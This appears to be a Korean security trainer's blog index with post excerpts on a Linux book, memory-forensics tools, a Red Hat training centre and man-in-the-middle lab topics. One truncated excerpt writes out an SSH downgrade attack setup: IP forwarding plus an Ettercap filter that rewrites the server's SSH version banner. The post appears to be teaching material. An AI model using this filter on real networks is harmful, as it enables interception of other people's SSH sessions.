본문 바로가기

테크넷과 함께하는 엔터프라이즈 리눅스 핵심 운영 가이드 vol.1 탈고 및 출간 테크넷 마스터 김재벌입니다. 어쩌다 보니 , 책을 또 출간하게 되었습니다. 사실 vol.2 는 지난주에 출간되었고 , vol.1은 지난 4월에 출간되었는데 , 페이스북에 지인분들께만 소개해 드리고 딱히 블로그에 포스팅은 안했네요. (vol.2 에 대해서는 별도 포스팅하도록 하겠습니다.) 엔터프라이즈 리눅스 핵심 운영 가이드 vol.1 은 기존의 솔라리스 11으로 배우는 입문 서적에서 다룬 기초이외에 실제 리눅스 시스템을 다루어야 하는 기술에 대해서 다룹니다. 입문서적은 이 녀석 이었지요? 수정 탈고본을 반영해서 지난번에 2차 개정판이 출간되었습니다. 2017년 4월에 출간된 녀석은 바로 아래 녀석이구요. RHEL 이나 Oracle Linux , CentOS 7.3을 기반으로 작성되었으며, 순수 관리 내용..
comae.io 메모리 분석 도구 모음 ( dumpit ) 포함 안녕하세요 테크넷 마스터 김재벌 입니다..^^ 침해사고 대응을 위해서 다양한 도구가 활용되는데 , 그중에 메모리 포렌식을 위해 메모리 덤프는 필수적이죠. 그중에 널리 사용되는것이 moonsols 의 dumpit 인데 , 어느날 찾아보니 , 사이트가 리뉴얼 되고 툴 구하는게 어려워져서 저도 가지고 있는 버전만 활용했었습니다. 그런데 , moonsols 가 아래 사이트로 변경되고 툴도 세트 형태로 나오더군요. https://my.comae.io/login 해당 도구를 다운 받기 위해서는 회사 메일이 있어야만 가능하고 , 인증 메일로만 로그인도 가능해서 공부하시는 분들이 활용하기에는 어려워 보여서 아예 다운 받아서 공유해 둡니다. dumpit 이외에도 Bin2DMP.exe , DMP2Bin.exe , Hibr..
레드햇 공인 교육 및 시험센터 - 노브레이크 부설 교육센터 테크넷 마스터 김재벌입니다. 어쩌다 보니 , 우리 회사가 벌써 레드햇 공인 교육센터 http://www.nobreak.co.kr/ 를 운영한지 2년이 후딱 갔네요. 저희 회사 홈페이지 입니다.. 나중에 개편이 좀 필요하긴 할것 같은데...^^ 오늘의 포스팅은 교육 파트에 대한 그것도 레드햇공인교육 관련 주제만 다룰 예정이라..추가적인 포스팅은 별도로 진행하겠습니다. 그동안 대기업 고객 , 공공기관 , 오픈소스 관련 기업, 학생들을 대상으로 정신없이 교육이 진행된 것 같네요.거의 쉴틈 없이 일년내내 교육이 진행이 되었습니다. 저희 회사는 보안 컨설팅 / 교육컨설팅을 주력으로 하고 있습니다. 법인 설립은 2012년도에 했으니, 5년차 이구요. 다양한 기업/교육기관에 강사 파견과 교육/보안컨설팅 , 연구과제를..
MITMF 를 이용한 공격 기법 - 파일 다운로드 보호되어 있는 글입니다.
SSH Downgrade Attack - Note ================================================A client (putty가 있는 xp)Putty.exe 실행 --> SSH를 이용 192.168.30.192(server 접속)=================================================공격자 셋팅1. 첫번째 터미널 #echo "1" > /proc/sys/net/ipv4/ip_forward #cat /proc/sys/net/ipv4/ip_forward (반드시 1로 셋팅되어야 한다.) 2. 두번째 터미널 #cat > sshdown.ecf if ( search(DATA.data, "SSH-1.99") ) { replace("SSH-1.99","SSH-1.5"); } (ctrl + d 를 동..
패킷 분석-1
MITMf 를 이용한 패스워드 도청 보호되어 있는 글입니다.
메모리 카빙 및 패킷 분석 보호되어 있는 글입니다.